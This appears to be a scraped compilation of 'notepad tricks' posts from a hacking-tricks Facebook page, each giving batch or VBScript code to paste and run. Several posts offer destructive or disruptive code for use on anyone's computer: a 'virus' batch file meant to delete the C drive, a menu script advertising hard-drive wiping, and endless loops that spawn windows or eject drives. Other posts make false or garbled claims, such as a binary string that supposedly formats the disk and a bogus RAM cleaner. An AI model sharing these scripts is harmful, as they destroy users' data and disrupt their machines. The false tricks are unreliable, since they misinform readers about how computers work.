Trick- Constantly Repeat A Message

CONSTANTLY REPEAT A MESSAGE

         •    Open the notepad
         •    Copy and paste following code
         •   
           @ECHO off
           :Begin
            msg * Hello
           msg * How are you?
             msg * Having fun!
            msg * Want more!
            msg * Lets start again
          GOTO BEGIN

        •    Save the file with .bat extension eg. fun.bat
        •    Open the saved file and see the magic.

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Hacking Tricks- Continously eject cd/dvd drives using notepad trick

CONTINOUSLY EJECT CD/DVD DRIVES USING NOTEPAD TRICK

      •    Open notepad
      •    Copy and paste following code in notepad

                 Set oWMP = CreateObject("WMPlayer.OCX.7")
                 Set colCDROMs = oWMP.cdromCollection
                  do
                  if colCDROMs.Count >= 1 then
                  For i = 0 to colCDROMs.Count - 1
                   colCDROMs.Item(i).Eject
                  Next
                 For i = 0 to colCDROMs.Count - 1
                 colCDROMs.Item(i).Eject
                 Next
                 End If
                  wscript.sleep 5000
                  loop

        •    Save the file with .vbs extension eg. fun.vbs
        •    Open the saved file and see the magic.

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Hacking Tricks- Create 1-5 number Shortcut keys

Pick Your Option Batch File

When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action accompanied by number):
1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
  • Open Notepad.
  • Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
  • Save the file with any name and with a .bat extension and close the file.
Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Hacking Tricks- Open Notepad continuously

  • Open Notepad.
  • Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
  • Save the file with any name nut with .bat extension and close it.
Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Tricks- How to lock Folder Using Notepad


step :1  Open Notepad and paste the following program in the notepad.

cls
:End
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD- 08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==harsha goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End



step :2  In the above program I am using harsha as the password of the file.
step :3  You can replace anything you like to make it as folder password.
step :4  Save the file anywhere in the system with a .bat suffix like something.bat
step :5  Here I am saving it as mylocker.bat on my system.
step :6 Double click on the something.bat file which you create, a new folder by name Locker will be created on the same location of bat file you saved.
step :7 Copy your files to this folder and open bat file again and type y and then enter to lock your folder.

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves 

Hacking Tricks- Create Virus using Batch file Programming

Hlw friends i back with you after a long time with notepad trick….how to create virus using notepad lets see….
Create this virus using batch file programming. This virus will delete the C Drive completely.
Create Virus using Batch file Programming
1. Open Notepad and copy below code into it.
@Echo off
Del C: *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.


Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Tricks- Cleanup Your RAM Without Using any Software Using Notepad


Random Access Memory is one of the main component of computer that is responsible for the process of the operating system. Speed based on your RAM and your sysyem cleanrnes.Since all the Operating systems support Multiprocessing, hence require a good RAM speed.
Today I have Small and Useful trick for RAM in Notepad.If your computer become slow, when you are working with many programs.Many People want to clean RAM But They Dont know the exact method for this. It may be due to RAM because at that time RAM is full of remaining progress pieces which you are working with and you do not need them any more.So if any one does not have any software, you can use it by doing the following things which I am going to mention.

Steps to Clean Your RAM Using Notepad:

Notepad Tricks- Cleanup Your RAM Without Using any Software Using Notepad
Step 1: Open Notepad
Step 2: When open your notepad copy and paste this code
FreeMem=Space(10240000000)
Above code is only for those who have 1GB(1024 MB) RAM, if you have 2GB(1024*2 = 2048 MB) RAM than replace 10240000000 from above code to 20480000000 and if you have 512 MB RAM in your Computer than replace 1024 from above code to 512

Notepad Tricks- Cleanup Your RAM Without Using any Software Using Notepad

STEP3 : Save it as “CLEAN.VBS” in any location where you like.
STEP4 : You can edit the code and write 512 instead of 64 if you own a 512mb RAM or change to anything you like.
STEP5 : Now Run it…
After this final step your RAM will be free.Now whenever you want to free up RAM by deleting temporary data present in it, you have to Just run CleanMyRAM.vbs once.Run any time when you think RAM speed is going slow.

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Trick- Format hard disk

Open Notepad and type:
Notepad Trick- Format hard disk
 a) Code : 01001011000111110010010101010101010000011111100000

Notepad Trick- Format hard disk

b) Save As it as  anything.EXE
c) Run it. Beware that the entire HDD will be erased


I hope you enjoyed these awesome and cool Notepad tricks, if you liked it then share it with your friends on Facebook.

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Trick- Print Tree Root

Print Tree Root - Notepad Trick
 Open NOTEPAD and enter {print tree root}
After that hit enter and type C:windowssystem
After that hit enter and type {print C:windowssystemwinlog
Hit enter and type 4*43″$@[455]3hr4~
Then save the file as teekids in C:windowssystem.

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Trick - Text to Audio

Notepad Trick - Text to Audio

Open Notepad file on your Windows PC. Copy and paste the below mentioned code :
Dim msg, sapi
msg=InputBox("Enter your text for conversion–www.techvorm.com","TechVorm Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")


Notepad Trick - Text to Audio

sapi.Speak msg Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Infinite Notepad Trick

  • Open Notepad.
  • Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
  • Save the file with any name nut with .bat extension and close it.
Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Trick to type slowly

Notepad Trick to type slowly
  • Open Notepad.
  • Paste the following code in the notepad file:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Notepad Trick to type slowly

  • Save the file with any name and with .vbs extension and close it.
Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Lets lock a folder using notepad trick

Lets lock a folder using notepad trick
Lets lock a folder using notepad trick
Lets lock a folder using notepad trick
which is named as PICS in your D: drive , whose path is D:PICS
Then the code should be something like this:
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Pics is your folder name. Use the name of the folder in place for pics. Save the text file as lock.bat in the same drive.


To unlock this locked folder:
Open another new notepad text file and type the following:
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics
 
Lets lock a folder using notepad trick

Save the text file as key.bat in the same drive. Here again, pics is the name of the folder. Change it to the folder name you want to lock it.

Notepad Tricks- Does When u Double click on Drive... New Window opens?

Whenever ppl double-click on any folder in Computer,
it opens in a new window even if selected the option “Always open folders in same window” in “Tools -> Folder Options”.
For this kind of Problem
Download following zip file, extract it and then run .REG file and confirm the action:
Download

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Tricks- Matrix Effect on your computer


Matrix Trick 300x180
Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:



  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves  

Notepad Tricks- Test Your Anti-Virus fake or original

Test Your Anti-Virus fake or original

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:

 Test Your Anti-Virus fake or original


  • Open Notepad.
  • Copy the code give below in the notepad file:
    X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • Save it with an .exe extension like testvirus.exe
As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.
NOTE: The EICAR test file (#3) is a 16-bit application and cannot be run on 64-bit versions of Windows.

Find latest hacking tricks , Windows tricks, internet tricks, Android Tricks, notepad tricks, Mobile Tricks, Recharge Tricks etc increase your knowledge with latest technology http://www.facebook.com/hackmoves